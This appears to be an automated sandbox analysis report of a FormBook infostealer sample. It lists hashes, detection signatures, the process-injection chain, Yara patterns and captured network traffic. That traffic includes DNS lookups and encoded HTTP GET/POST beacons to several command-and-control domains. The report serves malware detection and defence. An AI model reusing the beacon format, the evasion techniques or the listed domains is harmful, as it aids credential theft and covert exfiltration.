Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Products Order Catalogs20242.exe

Overview

General Information

Sample name:Products Order Catalogs20242.exe
Analysis ID:1528626
MD5:9835b14881b3b27767cdda4fafdb3506
SHA1:b5d14918e92602ccc7439dd2ee6a0c076218b2a0
SHA256:9e4ebf3412a36099adf96f26ffc3265a7a5b9eefc5f1a0d87f10dbadf82474c1
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Products Order Catalogs20242.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\Products Order Catalogs20242.exe" MD5: 9835B14881B3B27767CDDA4FAFDB3506)
    • svchost.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\Products Order Catalogs20242.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • brfQTUZMGd.exe (PID: 5592 cmdline: "C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • find.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • brfQTUZMGd.exe (PID: 5344 cmdline: "C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8028 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x140ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e113:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16182:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ef13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", CommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", ParentImage: C:\Users\user\Desktop\Products Order Catalogs20242.exe, ParentProcessId: 7420, ParentProcessName: Products Order Catalogs20242.exe, ProcessCommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", ProcessId: 7452, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", CommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", ParentImage: C:\Users\user\Desktop\Products Order Catalogs20242.exe, ParentProcessId: 7420, ParentProcessName: Products Order Catalogs20242.exe, ProcessCommandLine: "C:\Users\user\Desktop\Products Order Catalogs20242.exe", ProcessId: 7452, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Products Order Catalogs20242.exeReversingLabs: Detection: 21%
            Source: Products Order Catalogs20242.exeVirustotal: Detection: 29%Perma Link
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Products Order Catalogs20242.exeJoe Sandbox ML: detected
            Source: Products Order Catalogs20242.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: find.pdb source: svchost.exe, 00000001.00000002.2180830146.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2180850303.0000000003019000.00000004.00000020.00020000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000002.4191425116.00000000009C7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: brfQTUZMGd.exe, 00000005.00000002.4191667960.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp, brfQTUZMGd.exe, 00000007.00000000.2258103015.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Products Order Catalogs20242.exe, 00000000.00000003.1755475115.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, Products Order Catalogs20242.exe, 00000000.00000003.1757295424.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2089944890.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088009018.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.000000000379E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.000000000393E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000003.2181151035.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000003.2184224977.00000000035EF000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.00000000037A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Products Order Catalogs20242.exe, 00000000.00000003.1755475115.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, Products Order Catalogs20242.exe, 00000000.00000003.1757295424.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2181015352.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2089944890.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088009018.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2181015352.000000000379E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000006.00000002.4192472622.000000000393E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000006.00000003.2181151035.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000003.2184224977.00000000035EF000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192472622.00000000037A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: find.pdbGCTL source: svchost.exe, 00000001.00000002.2180830146.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2180850303.0000000003019000.00000004.00000020.00020000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000002.4191425116.00000000009C7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: find.exe, 00000006.00000002.4191342019.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192942372.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259727033.0000000002C5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001DECC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: find.exe, 00000006.00000002.4191342019.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.4192942372.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259727033.0000000002C5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001DECC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0304C530 FindFirstFileW,FindNextFileW,FindClose,6_2_0304C530
            Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then xor eax, eax6_2_03039A80
            Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then mov ebx, 00000004h6_2_036904DE

            Networking

            barindex
            Source: DNS query: www.sailforever.xyz
            Source: DNS query: www.luxurylive.xyz
            Source: DNS query: www.hcpf.xyz
            Source: DNS query: www.majorconcept.xyz
            Source: DNS query: www.32456.xyz
            Source: Joe Sandbox ViewIP Address: 34.251.91.168 34.251.91.168
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /uahh/?2FO=QBbT1R8&FJiPC=d5+MqVgVjHVNiwBxeGRD++FKVLlNYwBNfU+SeMm5F41Ss+LbbNQ+rUwfOJuObD11rI3Ncym0QxlhV9b+bLppILaSvV9n+mKxlSe4ZqDWTkAi7XxGHJdw410= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.sailforever.xyzUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /9jmy/?FJiPC=46rRghiH6UTMn5OdV0QmjQpTcS7uy0k/o2ugMl2w7VO9VKzwkLZc8aFCTSwfTjrwCajqXliJ4PKjo2fEacCh39HPVzKyhYEUGCUQRILZoBZxTwgJ2Hx73+k=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.my1pgz.proUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /vikk/?2FO=QBbT1R8&FJiPC=Vwm3+xEBUAulxK0F/Lnzrwv8wIKeamv3GC2vqAJo9BSRvdXyR+/4nl5nZn54cU6IqZGvOoCIPeejeQQ8mZnJIpSF+K87khcOo5HnxJigNxRW7ek1bxUyIJ4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.dealsbyaustin.onlineUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /qc9x/?FJiPC=CH6es5sz3Yp3Dzc51aPhdqkDrs8TQW5n7Byc8aIZtNO3gPawIMb4v5YCCRVXNYl8oq0F7aM/LA9nPzXcA0LmQW2fPOlpD7vAsWT5J3PgK+m9VafrfVSbrXQ=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.portfolioalex.netUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /8j8d/?2FO=QBbT1R8&FJiPC=lh9QeGQC50ZZ373XfJvrGDHHrSYqS///Rp9Ie6Cn/EIA2xGtYDPraNKli8GbiMktAJPkHJ/Gg+u1HXJ6v54myfeer2iKmQcCA8UVbpnYVYElllWY0U7drCk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.luxurylive.xyzUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /skre/?FJiPC=S+TX00U190oTp+a4+Mh6JOZKCfYk0qlS074izuiXtvjO4IlC6yG6IaWxS8JxCfvRqFT3VFWs4J33oL1Eg51tY/qkmOhlT5GkiLFdmWmV2m3xIoZVeIF78zA=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.hellosmall.infoUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /cauy/?2FO=QBbT1R8&FJiPC=PyTdyf7MBTV+gxszcm/SLHpt+YfE++r+U3XVnpxfSjDO6QTtkkjvi3Yn5wnWcyf5TfAKBJM6K26qTiz5xiPid6ZOvGIKLUwhcowB8dEz9H7fOuc+NjQG9Jg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.hcpf.xyzUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pvqa/?2FO=QBbT1R8&FJiPC=RLO5tcrCxJ5DbW4ZedTWBrzvBFkjbCggWXFTSCpZqt8FDcaILdRtdicCHXUrgshims5J8KWD1CKv/qFrWuRiVZ2kzqB7qEFPi/ItjJ1l7CTi/QfqH6jG1C0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.majorconcept.xyzUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /ucj8/?FJiPC=/OR0Gv3ARcC+oTiwVlgFvwfWLEZCPeymrzbXKOUlZ8hivfSIFELupuZNSeyona1zEh6C2fNDDz82Ku8poS/qbWUXFcIy31WMkdwjMbbyMeUh4DnqyXBk2Zk=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.32456.xyzUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /ow1m/?FJiPC=R0yC5R5LP37B+u7B47HBXCMiDtCwIfqPeOyqn1JZ4Ps9251xIaYYVL4nlvdWIAmm2UCAT0/m7O8NiPdCRWmEjk79M6Z+SJR86MwZjCyaTxX5jc3tUJ4oGgs=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.osi.gardenUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /v90x/?FJiPC=SV8zM0DpGKPq5vcKLjD0JfM0MkEh6YkwwbH6C33UC6CYdO1WGea88eauSogomnSMda8dbXQuQyBLu8v2S1S6T9QpW/51AxWZgFCLTAInw3sN81zK2reHc4Q=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.aed.shoppingUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /cyro/?2FO=QBbT1R8&FJiPC=D2ou5qRFRedTipDENHRzVKYWOwvjKcFZBYoEL10S44zk2vemCWVH9CYUDPjN2ps8GyxUcJ8ddPkdaoLhExzDkdmbipzXnEU922bDAaSjGv786nVvzAi8BXE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.pinkpantys.shopUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3gg7/?FJiPC=2+LBIiP/KoEhdnR3xwwMWckHXd3s+f0VYUCn+2NFE1occ+/W1XHNdoCDAgJCjDzuYXNE98f+eghrY5vQi1M98KcZ1LEUY4gMUibOg5uc8EJhnuelY3pNbdk=&2FO=QBbT1R8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.sdfhfgoool10.lifeUser-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.sailforever.xyz
            Source: global trafficDNS traffic detected: DNS query: www.my1pgz.pro
            Source: global trafficDNS traffic detected: DNS query: www.dealsbyaustin.online
            Source: global trafficDNS traffic detected: DNS query: www.portfolioalex.net
            Source: global trafficDNS traffic detected: DNS query: www.luxurylive.xyz
            Source: global trafficDNS traffic detected: DNS query: www.hellosmall.info
            Source: global trafficDNS traffic detected: DNS query: www.hcpf.xyz
            Source: global trafficDNS traffic detected: DNS query: www.sharilyn.org
            Source: global trafficDNS traffic detected: DNS query: www.majorconcept.xyz
            Source: global trafficDNS traffic detected: DNS query: www.32456.xyz
            Source: global trafficDNS traffic detected: DNS query: www.osi.garden
            Source: global trafficDNS traffic detected: DNS query: www.aed.shopping
            Source: global trafficDNS traffic detected: DNS query: www.pinkpantys.shop
            Source: global trafficDNS traffic detected: DNS query: www.sdfhfgoool10.life
            Source: global trafficDNS traffic detected: DNS query: www.concept.pink
            Source: unknownHTTP traffic detected: POST /9jmy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 202Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.my1pgz.proOrigin: http://www.my1pgz.proReferer: http://www.my1pgz.pro/9jmy/User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 46 4a 69 50 43 3d 31 34 44 78 6a 56 53 38 67 55 44 78 76 71 2b 48 63 6b 39 52 71 51 46 42 62 46 6e 48 79 31 31 6a 39 57 2b 62 47 56 2b 42 2b 55 4b 6c 56 59 71 68 75 50 42 44 37 4a 64 65 4d 6e 46 38 47 67 50 79 4e 49 44 42 57 45 33 55 73 73 75 47 67 69 54 34 61 4d 4b 37 79 2f 6a 53 63 41 47 73 6c 39 6b 72 48 6a 59 6a 41 35 48 7a 68 7a 70 34 64 53 73 58 71 6d 4e 4e 2b 75 6f 4e 79 4e 62 79 50 79 6d 36 36 6b 36 44 5a 45 34 4a 44 6f 7a 69 65 33 57 78 6c 47 6a 57 41 33 67 77 31 44 2f 54 78 74 65 34 53 63 6a 79 59 34 6c 79 33 34 51 6b 62 2f 6a 63 37 6c 52 49 59 66 41 61 4c 77 52 6b 63 47 43 77 54 67 3d 3d Data Ascii: FJiPC=14DxjVS8gUDxvq+Hck9RqQFBbFnHy11j9W+bGV+B+UKlVYqhuPBD7JdeMnF8GgPyNIDBWE3UssuGgiT4aMK7y/jScAGsl9krHjYjA5Hzhzp4dSsXqmNN+uoNyNbyPym66k6DZE4JDozie3WxlGjWA3gw1D/Txte4ScjyY4ly34Qkb/jc7lRIYfAaLwRkcGCwTg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 03:29:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 